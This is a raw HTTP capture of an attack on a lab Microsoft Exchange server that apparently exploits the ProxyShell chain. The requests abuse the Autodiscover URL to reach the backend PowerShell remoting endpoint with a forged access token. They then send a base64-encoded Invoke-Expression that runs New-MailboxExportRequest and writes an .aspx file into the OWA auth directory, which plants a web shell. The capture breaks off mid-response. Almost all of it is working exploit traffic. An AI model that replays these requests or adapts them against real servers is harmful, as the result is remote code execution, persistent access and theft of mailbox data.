X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 1062

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:120AB5EA-D10E-4CCE-8DA4-A96DA1C885A4</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:B800BAFE-974D-45D1-9222-75B36A142CF3</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAVAAAAAAAAAAAAMAAADKAQAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48VmVyc2lvbiBOPSJwcm90b2NvbHZlcnNpb24iPjIuMzwvVmVyc2lvbj48VmVyc2lvbiBOPSJQU1ZlcnNpb24iPjIuMDwvVmVyc2lvbj48VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1765

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:321FB2D8-3428-4F01-8066-0371BA930B81</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: fdfb9445-e572-4554-90f7-ed5008a28aee
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 2694

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:9D171238-0F01-4852-8E7C-D92C1919A8C6</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:321FB2D8-3428-4F01-8066-0371BA930B81</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAVEAAAAAAAAAAAMAAAWSAQAAAAkQAgCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48T2JqIE49IkFwcGxpY2F0aW9uUHJpdmF0ZURhdGEiIFJlZklkPSIxIj48VE4gUmVmSWQ9IjAiPjxUPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNQcmltaXRpdmVEaWN0aW9uYXJ5PC9UPjxUPlN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxEQ1Q+PEVuPjxTIE49IktleSI+U3VwcG9ydGVkVmVyc2lvbnM8L1M+PFMgTj0iVmFsdWUiPjE1LjEuMjE3Ni4yPC9TPjwvRW4+PEVuPjxTIE49IktleSI+SW1wbGljaXRSZW1vdGluZzwvUz48T2JqIE49IlZhbHVlIiBSZWZJZD0iMiI+PFROUmVmIFJlZklkPSIwIiAvPjxEQ1Q+PEVuPjxTIE49IktleSI+SGFzaDwvUz48STMyIE49IlZhbHVlIj4tNDEzODg2MjU1PC9JMzI+PC9Fbj48L0RDVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPlBTVmVyc2lvblRhYmxlPC9TPjxPYmogTj0iVmFsdWUiIFJlZklkPSIzIj48VE5SZWYgUmVmSWQ9IjAiIC8+PERDVD48RW4+PFMgTj0iS2V5Ij5QU1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjUuMS4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+UFNFZGl0aW9uPC9TPjxTIE49IlZhbHVlIj5EZXNrdG9wPC9TPjwvRW4+PEVuPjxTIE49IktleSI+UFNDb21wYXRpYmxlVmVyc2lvbnM8L1M+PE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjQiPjxUTiBSZWZJZD0iMSI+PFQ+U3lzdGVtLlZlcnNpb25bXTwvVD48VD5TeXN0ZW0uQXJyYXk8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxMU1Q+PFZlcnNpb24+MS4wPC9WZXJzaW9uPjxWZXJzaW9uPjIuMDwvVmVyc2lvbj48VmVyc2lvbj4zLjA8L1ZlcnNpb24+PFZlcnNpb24+NC4wPC9WZXJzaW9uPjxWZXJzaW9uPjUuMDwvVmVyc2lvbj48VmVyc2lvbj41LjEuMTQzOTMuMzg2NjwvVmVyc2lvbj48L0xTVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPkNMUlZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjQuMC4zMDMxOS40MjAwMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz48VmVyc2lvbiBOPSJWYWx1ZSI+MTAuMC4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+V1NNYW5TdGFja1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlBTUmVtb3RpbmdQcm90b2NvbFZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjIuMzwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPjxWZXJzaW9uIE49IlZhbHVlIj4xLjEuMC4xPC9WZXJzaW9uPjwvRW4+PC9EQ1Q+PC9PYmo+PC9Fbj48L0RDVD48L09iaj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1765

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:27B686DC-A44F-41E5-891D-67AF385E4767</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 6a008910-a03e-4365-87da-8ee0d337adae
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 930

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:E418DAE0-AD0F-48E0-96FF-EC9FF4D9C45F</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:27B686DC-A44F-41E5-891D-67AF385E4767</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAVIAAAAAAAAAAAMAAABnAQAAAAUQAgCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlJ1bnNwYWNlU3RhdGUiPjI8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 8221

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:D8752694-77F1-42EA-B7F0-45EA48ABF82D</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:CommandLine CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45"><rsp:Command>Invoke-Expression</rsp:Command><rsp:Arguments>AAAAAAAAAAMAAAAAAAAAAAMAABLYAgAAAAYQAgCRcqtkrXe/ToZ0tBT/b01Od66YR0OL3UOuN37K//eaRe+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxPYmogTj0iUG93ZXJTaGVsbCIgUmVmSWQ9IjEiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJDbWRzIiBSZWZJZD0iMiI+CiAgICAgICAgICA8VE4gUmVmSWQ9IjAiPgogICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QsIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24sIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1XV08L1Q+CiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgICAgICA8L1ROPgogICAgICAgICAgPExTVD4KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+CiAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgPFMgTj0iQ21kIj5OZXctTWFpbGJveEV4cG9ydFJlcXVlc3Q8L1M+CiAgICAgICAgICAgICAgICA8QiBOPSJJc1NjcmlwdCI+ZmFsc2U8L0I+CiAgICAgICAgICAgICAgICA8TmlsIE49IlVzZUxvY2FsU2NvcGUiIC8+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlTXlSZXN1bHQiIFJlZklkPSI0Ij4KICAgICAgICAgICAgICAgICAgPFROIFJlZklkPSIxIj4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QaXBlbGluZVJlc3VsdFR5cGVzPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5FbnVtPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5WYWx1ZVR5cGU8L1Q+CiAgICAgICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4KICAgICAgICAgICAgICAgICAgPC9UTj4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZVRvUmVzdWx0IiBSZWZJZD0iNSI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZVByZXZpb3VzUmVzdWx0cyIgUmVmSWQ9IjYiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VFcnJvciIgUmVmSWQ9IjciPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VXYXJuaW5nIiBSZWZJZD0iOCI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZVZlcmJvc2UiIFJlZklkPSI5Ij4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIxIiAvPgogICAgICAgICAgICAgICAgICA8VG9TdHJpbmc+Tm9uZTwvVG9TdHJpbmc+CiAgICAgICAgICAgICAgICAgIDxJMzI+MDwvSTMyPgogICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlRGVidWciIFJlZklkPSIxMCI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJBcmdzIiBSZWZJZD0iMTEiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+CiAgICAgICAgICAgICAgICAgIDxMU1Q+CiAgICAgICAgICAgICAgICAgICAgPE9iaiBSZWZJZD0iMTAwIj4KICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iTiI+LU5hbWU8L1M+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlYiPkxQMGhscjdldHA0WjwvUz4KICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPE9iaiBSZWZJZD0iMTAxIj4KICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iTiI+LU1haWxib3g8L1M+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlYiPnNtY2ludHlyZUBleGNoZy5sYW48L1M+CiAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMiI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1JbmNsdWRlRm9sZGVyczwvUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iViI+I0RyYWZ0cyM8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMyI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1Db250ZW50RmlsdGVyPC9TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJWIj4oU3ViamVjdCAtZXEgJ1FpQ2E4cURNSzEnKTwvUz4KICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPE9iaiBSZWZJZD0iMTA0Ij4KICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iTiI+LUV4Y2x1ZGVEdW1wc3RlcjwvUz4KICAgICAgICAgICAgICAgICAgICAgICAgPE5pbCBOPSJWIiAvPgogICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgICA8T2JqIFJlZklkPSIxMDUiPgogICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJOIj4tRmlsZVBhdGg8L1M+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlYiPlxcXFx3aW4tYnBpZDk1YWNxN2UuZXhjaGcubGFuXEMkXFByb2dyYW0gRmlsZXNcTWljcm9zb2Z0XEV4Y2hhbmdlIFNlcnZlclxWMTVcRnJvbnRFbmRcSHR0cFByb3h5XG93YVxhdXRoXDlDVEVvc3dUMi5hc3B4PC9TPgogICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICA8L09iaj4KICAgICAgICAgIDwvTFNUPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICAgICAgICA8TmlsIE49Ikhpc3RvcnkiIC8+CiAgICAgICAgPEIgTj0iUmVkaXJlY3RTaGVsbEVycm9yT3V0cHV0UGlwZSI+dHJ1ZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogICAgPEIgTj0iTm9JbnB1dCI+dHJ1ZTwvQj4KICAgIDxPYmogTj0iQXBhcnRtZW50U3RhdGUiIFJlZklkPSIyMyI+CiAgICAgIDxUTiBSZWZJZD0iMiI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iUmVtb3RlU3RyZWFtT3B0aW9ucyIgUmVmSWQ9IjI0Ij4KICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJlbW90ZVN0cmVhbU9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+MDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8QiBOPSJBZGRUb0hpc3RvcnkiPnRydWU8L0I+CiAgICA8T2JqIE49Ikhvc3RJbmZvIiBSZWZJZD0iMjUiPgogICAgICA8TVM+CiAgICAgICAgPEIgTj0iX2lzSG9zdE51bGwiPnRydWU8L0I+CiAgICAgICAgPEIgTj0iX2lzSG9zdFVJTnVsbCI+dHJ1ZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj50cnVlPC9CPgogICAgICAgIDxCIE49Il91c2VSdW5zcGFjZUhvc3QiPnRydWU8L0I+CiAgICAgIDwvTVM+CiAgICA8L09iaj4KICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICA8L01TPgo8L09iaj4K</rsp:Arguments></rsp:CommandLine></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 8e32123c-4c0b-4c26-82d3-54790f73c4d6
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 847

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" 